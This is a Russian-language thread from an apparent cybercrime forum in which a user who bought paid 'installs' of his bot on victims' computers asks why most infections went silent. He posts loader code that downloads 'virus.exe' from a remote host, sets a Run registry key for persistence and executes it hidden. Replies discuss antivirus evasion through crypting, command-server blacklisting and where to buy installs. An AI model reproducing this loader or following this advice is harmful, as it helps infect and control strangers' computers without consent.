• XSS.stack #1 – первый литературный журнал от юзеров форума

Вопрос по «загрузкам».

Ксакеповец

floppy-диск
Пользователь
Регистрация
17.04.2010
Сообщения
3
Реакции
0
Я очень слабо разбираюсь в этой теме, не совсем понимаю, по какому принципу работает данная сфера деятельности, и хотелось бы пару вопросов уточнить.

Договорился я с одним известным продавцом загрузок о покупке 50 инсталлов своего .exe за пару $ для теста, чтобы знать что это такое и как работает.
Грузил я своего самопального бота через пару кило-байтовый лоадер, который устанавливал в систему бота.
А устанавливал он его банальным способом.
1) создавал на системном диске директорию
2) через APIшку UrlMon копировал .exe по заданной ссылке в эту директорию.
3) прописывался в реестр через консоль (функция WinExec)
4) собственно запускал загруженный файл через эту же консоль (функция WinExec) и завершался. всё.


Значит было загружено 60 инсталлов, при этом реальный отстук моего бота был ровно 20 человек, из 60 успешных инсталлов отстучало 20, ну насколько мне известно это вприципе нормальная практика, вроде бы.... (кстати все 20 были исключительно за NAT’om)

Но самое интересное было на следующий день, когда в админку отстучались всего 3 человека, а остальные попросту с концом пропали, и вот это меня очень интересует, каким образом такое могло получиться? Было ли у кого такое в практике?

Я рассматриваю все логические варианты как такое могло произойти, ну например начав с себя.
1) мой лоадер + бот не палились ни одним антивирем, да и до сих пор не палятся, потому запаливание антивирями на компьютере жертв исключено.
2) прописывание в реестр происходило исправно и без глюков, тому есть 2 подтверждения, во первых успешный отстук бота который был запущен через консоль тем же способом, что и запись в реестр, ну и регулярный отстук 3 ботов.
3) админка не блокировала айпишники, преград к отстуку не было.
Со своей стороны я не вижу впринципе никаких допущенных ошибок, бот работает стабильно.

Но если посмотреть в сторону продавца, то я тоже не могу предположить, если он это сделал преднамеренно, то каким образом?
ну допустим он загрузил 60 загрузок через свой ботнет, а потом каким то образом отключил моего бота?
Крайне странно, можно ли так сделать вообще?
Я предполагаю один единственный вариант, это загрузка моего .exe через спец ботнет, который запускает его в своей виртуальной среде, а потом делает откат, других логических объяснений я не вижу.

Просьба тем, кто работает по загрузкам, напишите пожалуйста, по какой причине происходит отваливание всех приобретенных загрузок? Это может быть из за недобросовестности селлера, или же тут что то ещё?
 
теперь проверь ссыль куда они отстукивались... на сайтах типа malwaredomainlist.com , щас аверы оперативно работают , если у софта прямой коннект на сервак - то наверное занесли уже в черный список, ты проверь щас своего бота он может палитья
 
Я предполагаю один единственный вариант, это загрузка моего .exe через спец ботнет, который запускает его в своей виртуальной среде, а потом делает откат, других логических объяснений я не вижу.
это технически невозможно, а если возможно - то легко выяснить по ip-ам ботов...наверное дело в боте, от ошибок никто не застрахован ну или выложи сорц или часть сорца сюда, посмотрим что там и как...
прописывался в реестр через консоль (функция WinExec)
в реестр прописываться через функцию WinExec ? :blink:
 
Смотри что с автозагрузкой. Твой бот запустился и отстучался но это не значит что при ребуте винды он снова загрузится. Покури именно это часть. 3 которые до сих пор отстукивают - могут быть дедами или им подобными системами.
 
Может немного не в тему, но если есть возможность то в боте глянь сколько компьютер жертвы online, уж сильно походит на то, что бот после автозагрузки не отстучал.
 
у меня похожая проблемма.. загружал 100 штук отстучалось 75% .. суточный онлайн падает на глазах .. если в начале был 40% то через 3 дня уже 20% .. и крипт сз 20 антивирей не палится ни одним ..
 
которые до сих пор отстукивают - могут быть дедами или им подобными системами.
Маловероятно - чел сказал же, что все за натом :) Ты видел дедов за натом?

По сабжу - скорее всего проблемы с реестром. Как показывает практика кучи долбанных сборок каждая со своим характером оказывается. Вроде все тесты бот проходит на ура, а в реалке около 75% отстук - (с заведомо честным погрузом).
 
По поводу реестра ничего сверхъестественного нету, вот пожалуйста исходный кусок кода:
Код:
urlmon.URLDownloadToFile(nil,PChar('http://site.ru/virus.exe'),PChar('C:\примерное место инсталла\ага.exe'),0,nil);
winexec(PCHar('cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v botnet /t REG_SZ /d "C:\примерное место инсталла\ага.exe" /f'), sw_SPOILER);
winexec(PCHar('cmd.exe /c "C:\примерное место инсталла\ага.exe"'),sw_SPOILER);
Скачиваем, пишем в реестр через CMD, запускаем через CMD.

http://www.maxeg.org/?p=414
Нашёл отзыв о сервисе где я собственно и приобретал загрузки, ребята очень интересно пишут, анализируют и т.д...
+ на данном форуме тема от Одинокого Волка:
https://xss.pro/index.php?topic=18368
(тут даже в условии прописано отключение твоего бота).

Я полагал, что люди на этом форуме разбираются хотя бы немного в темах загрузок, и могут помочь советом, или пояснить ситуацию.
Жаль, но я ошибался, во всём надо разбираться самому, копать, исследовать, искать, методом научного тыка.
Полагаю спрашивать про "нормальные сервисы" тут так-же бесполезно.
Спасибо за внимание, и удачи.
 
Жаль, но я ошибался
Да, действительно просто так нихрена в руки не дается, увы.. А действия твоего мега лоадера отлично блокируются даже встроенным в винду файрволлом :)
Соответственно вероятность отстука его существенно ниже чем у любого другого толкового софта. Ты бы еще на батнике его собрал :)
Что касается толковых сервисов, то г-н Ar3s может все что нужно тебе подсказать.
Если ломает спрашивать, то можешь заглянуть на его страничку доверенных селлеров тут. Адьес, мучачос :rip2:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх